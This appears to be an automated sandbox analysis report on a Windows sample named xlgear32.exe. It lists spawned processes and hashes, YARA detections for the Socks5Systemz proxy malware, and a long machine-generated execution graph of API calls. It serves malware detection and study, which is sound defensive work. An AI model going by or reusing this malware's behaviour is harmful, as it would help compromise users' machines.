                                                                        Reputation:low
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:2
                                                                        Start time:20:32:56
                                                                        Start date:29/11/2024
                                                                        Path:C:\Windows\SysWOW64\net.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\system32\net.exe" pause xl_gear_11293
                                                                        Imagebase:0xbb0000
                                                                        File size:47'104 bytes
                                                                        MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:3
                                                                        Start time:20:32:56
                                                                        Start date:29/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:4
                                                                        Start time:20:32:57
                                                                        Start date:29/11/2024
                                                                        Path:C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe" -i
                                                                        Imagebase:0x400000
                                                                        File size:3'397'185 bytes
                                                                        MD5 hash:9DC53D054BB2482253850DA5D8DFF405
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000004.00000002.2937019748.0000000002CEA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000000.1688736742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe, Author: Joe Security
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:5
                                                                        Start time:20:32:57
                                                                        Start date:29/11/2024
                                                                        Path:C:\Windows\SysWOW64\net1.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\system32\net1 pause xl_gear_11293
                                                                        Imagebase:0xd70000
                                                                        File size:139'776 bytes
                                                                        MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Disassembly

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:21.2%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:2.4%
                                                                          Total number of Nodes:1498
                                                                          Total number of Limit Nodes:22
                                                                          execution_graph 4978 409c40 5019 4030dc 4978->5019 4980 409c56 5022 4042e8 4980->5022 4982 409c5b 5025 40457c GetModuleHandleA GetProcAddress 4982->5025 4988 409c6a 5042 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 4988->5042 5005 409d43 5104 4074a0 5005->5104 5007 409d05 5007->5005 5137 409aa0 5007->5137 5008 409d84 5108 407a28 5008->5108 5009 409d69 5009->5008 5010 409aa0 4 API calls 5009->5010 5010->5008 5012 409da9 5118 408b08 5012->5118 5016 409def 5017 408b08 21 API calls 5016->5017 5018 409e28 5016->5018 5017->5016 5147 403094 5019->5147 5021 4030e1 GetModuleHandleA GetCommandLineA 5021->4980 5024 404323 5022->5024 5148 403154 5022->5148 5024->4982 5026 404598 5025->5026 5027 40459f GetProcAddress 5025->5027 5026->5027 5028 4045b5 GetProcAddress 5027->5028 5029 4045ae 5027->5029 5030 4045c4 SetProcessDEPPolicy 5028->5030 5031 4045c8 5028->5031 5029->5028 5030->5031 5032 4065b8 5031->5032 5161 405c98 5032->5161 5041 406604 6F551CD0 5041->4988 5043 4090f7 5042->5043 5288 406fa0 SetErrorMode 5043->5288 5048 403198 4 API calls 5049 40913c 5048->5049 5050 409b30 GetSystemInfo VirtualQuery 5049->5050 5051 409be4 5050->5051 5052 409b5a 5050->5052 5056 409768 5051->5056 5052->5051 5053 409bc5 VirtualQuery 5052->5053 5054 409b84 VirtualProtect 5052->5054 5055 409bb3 VirtualProtect 5052->5055 5053->5051 5053->5052 5054->5052 5055->5053 5298 406bd0 GetCommandLineA 5056->5298 5058 409825 5060 4031b8 4 API calls 5058->5060 5059 406c2c 6 API calls 5062 409785 5059->5062 5061 40983f 5060->5061 5064 406c2c 5061->5064 5062->5058 5062->5059 5063 403454 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5062->5063 5063->5062 5065 406c53 GetModuleFileNameA 5064->5065 5066 406c77 GetCommandLineA 5064->5066 5067 403278 4 API calls 5065->5067 5068 406c7c 5066->5068 5069 406c75 5067->5069 5070 406c81 5068->5070 5071 406af0 4 API calls 5068->5071 5074 406c89 5068->5074 5072 406ca4 5069->5072 5073 403198 4 API calls 5070->5073 5071->5068 5075 403198 4 API calls 5072->5075 5073->5074 5076 40322c 4 API calls 5074->5076 5077 406cb9 5075->5077 5076->5072 5078 4031e8 5077->5078 5079 4031ec 5078->5079 5082 4031fc 5078->5082 5081 403254 4 API calls 5079->5081 5079->5082 5080 403228 5084 4074e0 5080->5084 5081->5082 5082->5080 5083 4025ac 4 API calls 5082->5083 5083->5080 5085 4074ea 5084->5085 5319 407576 5085->5319 5322 407578 5085->5322 5086 407516 5087 40752a 5086->5087 5325 40748c GetLastError 5086->5325 5091 409bec FindResourceA 5087->5091 5092 409c01 5091->5092 5093 409c06 SizeofResource 5091->5093 5094 409aa0 4 API calls 5092->5094 5095 409c13 5093->5095 5096 409c18 LoadResource 5093->5096 5094->5093 5097 409aa0 4 API calls 5095->5097 5098 409c26 5096->5098 5099 409c2b LockResource 5096->5099 5097->5096 5100 409aa0 4 API calls 5098->5100 5101 409c37 5099->5101 5102 409c3c 5099->5102 5100->5099 5103 409aa0 4 API calls 5101->5103 5102->5007 5134 407918 5102->5134 5103->5102 5105 4074b4 5104->5105 5106 4074c4 5105->5106 5107 4073ec 20 API calls 5105->5107 5106->5009 5107->5106 5109 407a35 5108->5109 5110 405880 4 API calls 5109->5110 5111 407a89 5109->5111 5110->5111 5112 407918 InterlockedExchange 5111->5112 5113 407a9b 5112->5113 5114 405880 4 API calls 5113->5114 5115 407ab1 5113->5115 5114->5115 5116 405880 4 API calls 5115->5116 5117 407af4 5115->5117 5116->5117 5117->5012 5127 408b82 5118->5127 5133 408b39 5118->5133 5119 407cb8 21 API calls 5119->5133 5120 408bcd 5433 407cb8 5120->5433 5121 407cb8 21 API calls 5121->5127 5124 408be4 5126 4031b8 4 API calls 5124->5126 5125 4034f0 4 API calls 5125->5127 5128 408bfe 5126->5128 5127->5120 5127->5121 5127->5125 5131 403420 4 API calls 5127->5131 5132 4031e8 4 API calls 5127->5132 5144 404c10 5128->5144 5129 403420 4 API calls 5129->5133 5130 4031e8 4 API calls 5130->5133 5131->5127 5132->5127 5133->5119 5133->5127 5133->5129 5133->5130 5424 4034f0 5133->5424 5459 4078c4 5134->5459 5138 409ac1 5137->5138 5139 409aa9 5137->5139 5141 405880 4 API calls 5138->5141 5140 405880 4 API calls 5139->5140 5142 409abb 5140->5142 5143 409ad2 5141->5143 5142->5005 5143->5005 5145 402594 4 API calls 5144->5145 5146 404c1b 5145->5146 5146->5016 5147->5021 5149 403164 5148->5149 5150 40318c TlsGetValue 5148->5150 5149->5024 5151 403196 5150->5151 5152 40316f 5150->5152 5151->5024 5156 40310c 5152->5156 5154 403174 TlsGetValue 5155 403184 5154->5155 5155->5024 5157 403120 LocalAlloc 5156->5157 5158 403116 5156->5158 5159 40313e TlsSetValue 5157->5159 5160 403132 5157->5160 5158->5157 5159->5160 5160->5154 5233 405930 5161->5233 5164 405270 GetSystemDefaultLCID 5166 4052a6 5164->5166 5165 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5165->5166 5166->5165 5167 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5166->5167 5168 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5166->5168 5171 405308 5166->5171 5167->5166 5168->5166 5169 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5169->5171 5170 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5170->5171 5171->5169 5171->5170 5172 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5171->5172 5173 40538b 5171->5173 5172->5171 5266 4031b8 5173->5266 5176 4053b4 GetSystemDefaultLCID 5270 4051fc GetLocaleInfoA 5176->5270 5179 4031e8 4 API calls 5180 4053f4 5179->5180 5181 4051fc 5 API calls 5180->5181 5182 405409 5181->5182 5183 4051fc 5 API calls 5182->5183 5184 40542d 5183->5184 5276 405248 GetLocaleInfoA 5184->5276 5187 405248 GetLocaleInfoA 5188 40545d 5187->5188 5189 4051fc 5 API calls 5188->5189 5190 405477 5189->5190 5191 405248 GetLocaleInfoA 5190->5191 5192 405494 5191->5192 5193 4051fc 5 API calls 5192->5193 5194 4054ae 5193->5194 5195 4031e8 4 API calls 5194->5195 5196 4054bb 5195->5196 5197 4051fc 5 API calls 5196->5197 5198 4054d0 5197->5198 5199 4031e8 4 API calls 5198->5199 5200 4054dd 5199->5200 5201 405248 GetLocaleInfoA 5200->5201 5202 4054eb 5201->5202 5203 4051fc 5 API calls 5202->5203 5204 405505 5203->5204 5205 4031e8 4 API calls 5204->5205 5206 405512 5205->5206 5207 4051fc 5 API calls 5206->5207 5208 405527 5207->5208 5209 4031e8 4 API calls 5208->5209 5210 405534 5209->5210 5211 4051fc 5 API calls 5210->5211 5212 405549 5211->5212 5213 405566 5212->5213 5214 405557 5212->5214 5215 40322c 4 API calls 5213->5215 5284 40322c 5214->5284 5217 405564 5215->5217 5218 4051fc 5 API calls 5217->5218 5219 405588 5218->5219 5220 4055a5 5219->5220 5221 405596 5219->5221 5223 403198 4 API calls 5220->5223 5222 40322c 4 API calls 5221->5222 5224 4055a3 5222->5224 5223->5224 5278 4033b4 5224->5278 5226 4055c7 5227 4033b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5226->5227 5228 4055e1 5227->5228 5229 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5228->5229 5230 4055fb 5229->5230 5231 405ce4 GetVersionExA 5230->5231 5232 405cfb 5231->5232 5232->5041 5234 40593c 5233->5234 5241 404ccc LoadStringA 5234->5241 5237 4031e8 4 API calls 5238 40596d 5237->5238 5244 403198 5238->5244 5248 403278 5241->5248 5245 4031b7 5244->5245 5246 40319e 5244->5246 5245->5164 5246->5245 5262 4025ac 5246->5262 5253 403254 5248->5253 5250 403288 5251 403198 4 API calls 5250->5251 5252 4032a0 5251->5252 5252->5237 5254 403274 5253->5254 5255 403258 5253->5255 5254->5250 5258 402594 5255->5258 5257 403261 5257->5250 5259 402598 5258->5259 5260 4025a2 5258->5260 5259->5260 5261 403154 4 API calls 5259->5261 5260->5257 5260->5260 5261->5260 5263 4025b0 5262->5263 5264 4025ba 5262->5264 5263->5264 5265 403154 4 API calls 5263->5265 5264->5245 5264->5264 5265->5264 5268 4031be 5266->5268 5267 4031e3 5267->5176 5268->5267 5269 4025ac 4 API calls 5268->5269 5269->5268 5271 405223 5270->5271 5272 405235 5270->5272 5273 403278 4 API calls 5271->5273 5274 40322c 4 API calls 5272->5274 5275 405233 5273->5275 5274->5275 5275->5179 5277 405264 5276->5277 5277->5187 5279 4033bc 5278->5279 5280 403254 4 API calls 5279->5280 5281 4033cf 5280->5281 5282 4031e8 4 API calls 5281->5282 5283 4033f7 5282->5283 5286 403230 5284->5286 5285 403252 5285->5217 5286->5285 5287 4025ac 4 API calls 5286->5287 5287->5285 5296 403414 5288->5296 5291 406fee 5292 407284 FormatMessageA 5291->5292 5293 4072aa 5292->5293 5294 403278 4 API calls 5293->5294 5295 4072c7 5294->5295 5295->5048 5297 403418 LoadLibraryA 5296->5297 5297->5291 5305 406af0 5298->5305 5300 406bf3 5301 406c05 5300->5301 5302 406af0 4 API calls 5300->5302 5303 403198 4 API calls 5301->5303 5302->5300 5304 406c1a 5303->5304 5304->5062 5306 406b1c 5305->5306 5307 403278 4 API calls 5306->5307 5308 406b29 5307->5308 5315 403420 5308->5315 5310 406b31 5311 4031e8 4 API calls 5310->5311 5312 406b49 5311->5312 5313 403198 4 API calls 5312->5313 5314 406b6b 5313->5314 5314->5300 5316 403426 5315->5316 5318 403437 5315->5318 5317 403254 4 API calls 5316->5317 5316->5318 5317->5318 5318->5310 5320 407578 5319->5320 5321 4075b7 CreateFileA 5320->5321 5321->5086 5323 403414 5322->5323 5324 4075b7 CreateFileA 5323->5324 5324->5086 5328 4073ec 5325->5328 5329 407284 5 API calls 5328->5329 5330 407414 5329->5330 5331 407434 5330->5331 5337 405184 5330->5337 5340 405880 5331->5340 5334 407443 5335 403198 4 API calls 5334->5335 5336 407460 5335->5336 5336->5087 5344 405198 5337->5344 5341 405887 5340->5341 5342 4031e8 4 API calls 5341->5342 5343 40589f 5342->5343 5343->5334 5345 4051b5 5344->5345 5352 404e48 5345->5352 5348 4051e1 5350 403278 4 API calls 5348->5350 5351 405193 5350->5351 5351->5331 5355 404e63 5352->5355 5353 404e75 5353->5348 5357 404bd4 5353->5357 5355->5353 5360 404f6a 5355->5360 5367 404e3c 5355->5367 5358 405930 5 API calls 5357->5358 5359 404be5 5358->5359 5359->5348 5361 404f7b 5360->5361 5364 404fc9 5360->5364 5363 40504f 5361->5363 5361->5364 5366 404fe7 5363->5366 5374 404e28 5363->5374 5364->5366 5370 404de4 5364->5370 5366->5355 5368 403198 4 API calls 5367->5368 5369 404e46 5368->5369 5369->5355 5371 404df2 5370->5371 5377 404bec 5371->5377 5373 404e20 5373->5364 5390 4039a4 5374->5390 5380 4059a0 5377->5380 5379 404c05 5379->5373 5381 4059ae 5380->5381 5382 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5381->5382 5383 4059d8 5382->5383 5384 405184 19 API calls 5383->5384 5385 4059e6 5384->5385 5386 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5385->5386 5387 4059f1 5386->5387 5388 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5387->5388 5389 405a0b 5388->5389 5389->5379 5391 4039ab 5390->5391 5396 4038b4 5391->5396 5393 4039cb 5394 403198 4 API calls 5393->5394 5395 4039d2 5394->5395 5395->5366 5397 4038d5 5396->5397 5398 4038c8 5396->5398 5400 403934 5397->5400 5401 4038db 5397->5401 5399 403780 6 API calls 5398->5399 5404 4038d0 5399->5404 5402 403993 5400->5402 5403 40393b 5400->5403 5405 4038e1 5401->5405 5406 4038ee 5401->5406 5407 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5402->5407 5408 403941 5403->5408 5409 40394b 5403->5409 5404->5393 5410 403894 6 API calls 5405->5410 5411 403894 6 API calls 5406->5411 5407->5404 5412 403864 9 API calls 5408->5412 5413 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5409->5413 5410->5404 5414 4038fc 5411->5414 5412->5404 5415 40395d 5413->5415 5416 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5414->5416 5418 403864 9 API calls 5415->5418 5417 403917 5416->5417 5420 40374c VariantClear 5417->5420 5419 403976 5418->5419 5422 40374c VariantClear 5419->5422 5421 40392c 5420->5421 5421->5393 5423 40398b 5422->5423 5423->5393 5425 4034fd 5424->5425 5431 40352d 5424->5431 5427 403526 5425->5427 5429 403509 5425->5429 5426 403198 4 API calls 5432 403517 5426->5432 5428 403254 4 API calls 5427->5428 5428->5431 5439 4025c4 5429->5439 5431->5426 5432->5133 5434 407cd3 5433->5434 5438 407cc8 5433->5438 5443 407c5c 5434->5443 5437 405880 4 API calls 5437->5438 5438->5124 5440 4025ca 5439->5440 5441 4025dc 5440->5441 5442 403154 4 API calls 5440->5442 5441->5432 5441->5441 5442->5441 5444 407c70 5443->5444 5445 407caf 5443->5445 5444->5445 5447 407bac 5444->5447 5445->5437 5445->5438 5448 407bb7 5447->5448 5451 407bc8 5447->5451 5449 405880 4 API calls 5448->5449 5449->5451 5450 4074a0 20 API calls 5452 407bdc 5450->5452 5451->5450 5453 4074a0 20 API calls 5452->5453 5454 407bfd 5453->5454 5455 407918 InterlockedExchange 5454->5455 5456 407c12 5455->5456 5457 407c28 5456->5457 5458 405880 4 API calls 5456->5458 5457->5444 5458->5457 5460 4078d6 5459->5460 5461 4078e7 5459->5461 5462 4078db InterlockedExchange 5460->5462 5461->5007 5462->5461 6235 409e47 6236 409e6c 6235->6236 6237 4098f4 15 API calls 6236->6237 6241 409e71 6237->6241 6238 409ec4 6269 4026c4 GetSystemTime 6238->6269 6240 409ec9 6242 409330 32 API calls 6240->6242 6241->6238 6244 408dd8 4 API calls 6241->6244 6243 409ed1 6242->6243 6245 4031e8 4 API calls 6243->6245 6246 409ea0 6244->6246 6247 409ede 6245->6247 6248 409ea8 MessageBoxA 6246->6248 6249 406928 5 API calls 6247->6249 6248->6238 6250 409eb5 6248->6250 6251 409eeb 6249->6251 6252 405854 5 API calls 6250->6252 6253 4066c0 5 API calls 6251->6253 6252->6238 6254 409efb 6253->6254 6255 406638 5 API calls 6254->6255 6256 409f0c 6255->6256 6257 403340 4 API calls 6256->6257 6258 409f1a 6257->6258 6259 4031e8 4 API calls 6258->6259 6260 409f2a 6259->6260 6261 4074e0 23 API calls 6260->6261 6262 409f69 6261->6262 6263 402594 4 API calls 6262->6263 6264 409f89 6263->6264 6265 407a28 5 API calls 6264->6265 6266 409fcb 6265->6266 6267 407cb8 21 API calls 6266->6267 6268 409ff2 6267->6268 6269->6240 6196 407548 6197 407554 CloseHandle 6196->6197 6198 40755d 6196->6198 6197->6198 6648 402b48 RaiseException 6199 407749 6200 4076dc WriteFile 6199->6200 6209 407724 6199->6209 6201 4076e8 6200->6201 6202 4076ef 6200->6202 6203 40748c 21 API calls 6201->6203 6204 407700 6202->6204 6205 4073ec 20 API calls 6202->6205 6203->6202 6205->6204 6206 4077e0 6207 4078db InterlockedExchange 6206->6207 6208 407890 6206->6208 6210 4078e7 6207->6210 6209->6199 6209->6206 6649 40294a 6650 402952 6649->6650 6651 402967 6650->6651 6652 403554 4 API calls 6650->6652 6652->6650 6653 403f4a 6654 403f53 6653->6654 6655 403f5c 6653->6655 6657 403f07 6654->6657 6660 403f09 6657->6660 6659 403f3c 6659->6655 6662 403154 4 API calls 6660->6662 6664 403e9c 6660->6664 6667 403f3d 6660->6667 6680 403e9c 6660->6680 6661 403ecf 6661->6655 6662->6660 6663 403ef2 6665 402674 4 API calls 6663->6665 6664->6659 6664->6663 6669 403ea9 6664->6669 6671 403e8e 6664->6671 6665->6661 6667->6655 6669->6661 6670 402674 4 API calls 6669->6670 6670->6661 6672 403e4c 6671->6672 6673 403e67 6672->6673 6674 403e62 6672->6674 6675 403e7b 6672->6675 6678 403e78 6673->6678 6679 402674 4 API calls 6673->6679 6677 403cc8 4 API calls 6674->6677 6676 402674 4 API calls 6675->6676 6676->6678 6677->6673 6678->6663 6678->6669 6679->6678 6681 403ed7 6680->6681 6687 403ea9 6680->6687 6683 403ef2 6681->6683 6685 403e8e 4 API calls 6681->6685 6682 403ecf 6682->6660 6684 402674 4 API calls 6683->6684 6684->6682 6686 403ee6 6685->6686 6686->6683 6686->6687 6687->6682 6688 402674 4 API calls 6687->6688 6688->6682 6697 405150 6698 405163 6697->6698 6699 404e48 19 API calls 6698->6699 6700 405177 6699->6700 6270 403a52 6271 403a74 6270->6271 6272 403a5a WriteFile 6270->6272 6272->6271 6273 403a78 GetLastError 6272->6273 6273->6271 6274 402654 6275 403154 4 API calls 6274->6275 6276 402614 6275->6276 6277 402632 6276->6277 6278 403154 4 API calls 6276->6278 6277->6277 6278->6277 5645 409e62 5646 409aa0 4 API calls 5645->5646 5647 409e67 5646->5647 5648 409e6c 5647->5648 5748 402f24 5647->5748 5682 4098f4 5648->5682 5651 409e71 5652 409ec4 5651->5652 5753 408dd8 5651->5753 5687 4026c4 GetSystemTime 5652->5687 5654 409ec9 5688 409330 5654->5688 5658 4031e8 4 API calls 5660 409ede 5658->5660 5659 409ea0 5661 409ea8 MessageBoxA 5659->5661 5706 406928 5660->5706 5661->5652 5663 409eb5 5661->5663 5756 405854 5663->5756 5669 409f0c 5733 403340 5669->5733 5671 409f1a 5672 4031e8 4 API calls 5671->5672 5673 409f2a 5672->5673 5674 4074e0 23 API calls 5673->5674 5675 409f69 5674->5675 5676 402594 4 API calls 5675->5676 5677 409f89 5676->5677 5678 407a28 5 API calls 5677->5678 5679 409fcb 5678->5679 5680 407cb8 21 API calls 5679->5680 5681 409ff2 5680->5681 5760 40953c 5682->5760 5687->5654 5697 409350 5688->5697 5691 409375 CreateDirectoryA 5692 4093ed 5691->5692 5693 40937f GetLastError 5691->5693 5694 40322c 4 API calls 5692->5694 5693->5697 5695 4093f7 5694->5695 5698 4031b8 4 API calls 5695->5698 5696 408dd8 4 API calls 5696->5697 5697->5691 5697->5696 5702 407284 5 API calls 5697->5702 5705 405880 4 API calls 5697->5705 5852 406cf4 5697->5852 5875 409224 5697->5875 5894 404c84 5697->5894 5897 408da8 5697->5897 5700 409411 5698->5700 5701 4031b8 4 API calls 5700->5701 5703 40941e 5701->5703 5702->5697 5703->5658 5705->5697 6007 406820 5706->6007 5709 403454 4 API calls 5710 40694a 5709->5710 5711 4066c0 5710->5711 6012 4068e4 5711->6012 5714 4066f0 5717 403340 4 API calls 5714->5717 5715 4066fe 5716 403454 4 API calls 5715->5716 5718 406711 5716->5718 5719 4066fc 5717->5719 5720 403340 4 API calls 5718->5720 5721 403198 4 API calls 5719->5721 5720->5719 5722 406733 5721->5722 5723 406638 5722->5723 5724 406642 5723->5724 5725 406665 5723->5725 6018 406950 5724->6018 5727 40322c 4 API calls 5725->5727 5729 40666e 5727->5729 5728 406649 5728->5725 5730 406654 5728->5730 5729->5669 5731 403340 4 API calls 5730->5731 5732 406662 5731->5732 5732->5669 5734 403344 5733->5734 5735 4033a5 5733->5735 5736 4031e8 5734->5736 5737 40334c 5734->5737 5739 4031fc 5736->5739 5741 403254 4 API calls 5736->5741 5737->5735 5738 40335b 5737->5738 5742 4031e8 4 API calls 5737->5742 5743 403254 4 API calls 5738->5743 5740 403228 5739->5740 5744 4025ac 4 API calls 5739->5744 5740->5671 5741->5739 5742->5738 5745 403375 5743->5745 5744->5740 5746 4031e8 4 API calls 5745->5746 5747 4033a1 5746->5747 5747->5671 5749 403154 4 API calls 5748->5749 5750 402f29 5749->5750 6024 402bcc 5750->6024 5752 402f51 5752->5752 5754 408da8 4 API calls 5753->5754 5755 408df4 5754->5755 5755->5659 5757 405859 5756->5757 5758 405930 5 API calls 5757->5758 5759 40586b 5758->5759 5759->5759 5767 40955b 5760->5767 5761 409590 5764 40959d GetUserDefaultLangID 5761->5764 5768 409592 5761->5768 5762 409594 5778 407024 GetModuleHandleA GetProcAddress 5762->5778 5764->5768 5766 40956f 5772 409884 5766->5772 5767->5761 5767->5762 5767->5766 5768->5766 5769 4095cb GetACP 5768->5769 5770 4095ef 5768->5770 5769->5766 5769->5768 5770->5766 5771 409615 GetACP 5770->5771 5771->5766 5771->5770 5773 40988c 5772->5773 5777 4098c6 5772->5777 5774 403420 4 API calls 5773->5774 5773->5777 5775 4098c0 5774->5775 5836 408e80 5775->5836 5777->5651 5779 407067 5778->5779 5780 40705e 5778->5780 5781 407070 5779->5781 5782 4070a8 5779->5782 5791 403198 4 API calls 5780->5791 5799 406f68 5781->5799 5784 406f68 RegOpenKeyExA 5782->5784 5786 4070c1 5784->5786 5785 407089 5787 4070de 5785->5787 5802 406f5c 5785->5802 5786->5787 5788 406f5c 6 API calls 5786->5788 5789 40322c 4 API calls 5787->5789 5792 4070d5 RegCloseKey 5788->5792 5793 4070eb 5789->5793 5795 407120 5791->5795 5792->5787 5805 4032fc 5793->5805 5797 403198 4 API calls 5795->5797 5798 407128 5797->5798 5798->5768 5800 406f73 5799->5800 5801 406f79 RegOpenKeyExA 5799->5801 5800->5801 5801->5785 5819 406e10 5802->5819 5806 403300 5805->5806 5807 40333f 5805->5807 5808 4031e8 5806->5808 5809 40330a 5806->5809 5807->5780 5815 4031fc 5808->5815 5816 403254 4 API calls 5808->5816 5810 403334 5809->5810 5811 40331d 5809->5811 5814 4034f0 4 API calls 5810->5814 5812 4034f0 4 API calls 5811->5812 5817 403322 5812->5817 5813 403228 5813->5780 5814->5817 5815->5813 5818 4025ac 4 API calls 5815->5818 5816->5815 5817->5780 5818->5813 5820 406e36 RegQueryValueExA 5819->5820 5821 406e59 5820->5821 5826 406e7b 5820->5826 5822 406e73 5821->5822 5821->5826 5827 403278 4 API calls 5821->5827 5828 403420 4 API calls 5821->5828 5824 403198 4 API calls 5822->5824 5823 403198 4 API calls 5825 406f47 RegCloseKey 5823->5825 5824->5826 5825->5787 5826->5823 5827->5821 5829 406eb0 RegQueryValueExA 5828->5829 5829->5820 5830 406ecc 5829->5830 5830->5826 5831 4034f0 4 API calls 5830->5831 5832 406f0e 5831->5832 5833 406f20 5832->5833 5835 403420 4 API calls 5832->5835 5834 4031e8 4 API calls 5833->5834 5834->5826 5835->5833 5837 408e8e 5836->5837 5839 408ea6 5837->5839 5849 408e18 5837->5849 5840 408e18 4 API calls 5839->5840 5841 408eca 5839->5841 5840->5841 5842 407918 InterlockedExchange 5841->5842 5843 408ee5 5842->5843 5844 408e18 4 API calls 5843->5844 5846 408ef8 5843->5846 5844->5846 5845 408e18 4 API calls 5845->5846 5846->5845 5847 403278 4 API calls 5846->5847 5848 408f27 5846->5848 5847->5846 5848->5777 5850 405880 4 API calls 5849->5850 5851 408e29 5850->5851 5851->5839 5901 406a58 5852->5901 5855 406d26 5857 406a58 5 API calls 5855->5857 5859 406d72 5855->5859 5858 406d36 5857->5858 5860 406d42 5858->5860 5862 406a34 7 API calls 5858->5862 5909 406888 5859->5909 5860->5859 5865 406a58 5 API calls 5860->5865 5871 406d67 5860->5871 5862->5860 5867 406d5b 5865->5867 5866 406638 5 API calls 5868 406d87 5866->5868 5869 406a34 7 API calls 5867->5869 5867->5871 5870 40322c 4 API calls 5868->5870 5869->5871 5872 406d91 5870->5872 5871->5859 5921 406cc8 GetWindowsDirectoryA 5871->5921 5873 4031b8 4 API calls 5872->5873 5874 406dab 5873->5874 5874->5697 5876 409244 5875->5876 5877 406638 5 API calls 5876->5877 5878 40925d 5877->5878 5879 40322c 4 API calls 5878->5879 5884 409268 5879->5884 5881 406978 6 API calls 5881->5884 5882 4033b4 4 API calls 5882->5884 5883 408dd8 4 API calls 5883->5884 5884->5881 5884->5882 5884->5883 5885 405880 4 API calls 5884->5885 5887 4092e4 5884->5887 5961 4091b0 5884->5961 5969 409034 5884->5969 5885->5884 5888 40322c 4 API calls 5887->5888 5889 4092ef 5888->5889 5890 4031b8 4 API calls 5889->5890 5891 409309 5890->5891 5892 403198 4 API calls 5891->5892 5893 409311 5892->5893 5893->5697 5895 405198 19 API calls 5894->5895 5896 404ca2 5895->5896 5896->5697 5898 408dc8 5897->5898 5997 408c80 5898->5997 5902 4034f0 4 API calls 5901->5902 5903 406a6b 5902->5903 5904 406a82 GetEnvironmentVariableA 5903->5904 5908 406a95 5903->5908 5923 406dec 5903->5923 5904->5903 5905 406a8e 5904->5905 5906 403198 4 API calls 5905->5906 5906->5908 5908->5855 5918 406a34 5908->5918 5910 403414 5909->5910 5911 4068ab GetFullPathNameA 5910->5911 5912 4068b7 5911->5912 5913 4068ce 5911->5913 5912->5913 5914 4068bf 5912->5914 5915 40322c 4 API calls 5913->5915 5916 403278 4 API calls 5914->5916 5917 4068cc 5915->5917 5916->5917 5917->5866 5927 4069dc 5918->5927 5922 406ce9 5921->5922 5922->5859 5924 406dfa 5923->5924 5925 4034f0 4 API calls 5924->5925 5926 406e08 5925->5926 5926->5903 5934 406978 5927->5934 5929 4069fe 5930 406a06 GetFileAttributesA 5929->5930 5931 406a1b 5930->5931 5932 403198 4 API calls 5931->5932 5933 406a23 5932->5933 5933->5855 5944 406744 5934->5944 5936 4069b0 5939 4069c6 5936->5939 5940 4069bb 5936->5940 5938 406989 5938->5936 5951 406970 CharPrevA 5938->5951 5952 403454 5939->5952 5941 40322c 4 API calls 5940->5941 5943 4069c4 5941->5943 5943->5929 5947 406755 5944->5947 5945 4067b9 5946 406680 IsDBCSLeadByte 5945->5946 5948 4067b4 5945->5948 5946->5948 5947->5945 5949 406773 5947->5949 5948->5938 5949->5948 5959 406680 IsDBCSLeadByte 5949->5959 5951->5938 5953 403486 5952->5953 5954 403459 5952->5954 5955 403198 4 API calls 5953->5955 5954->5953 5957 40346d 5954->5957 5956 40347c 5955->5956 5956->5943 5958 403278 4 API calls 5957->5958 5958->5956 5960 406694 5959->5960 5960->5949 5962 403198 4 API calls 5961->5962 5964 4091d1 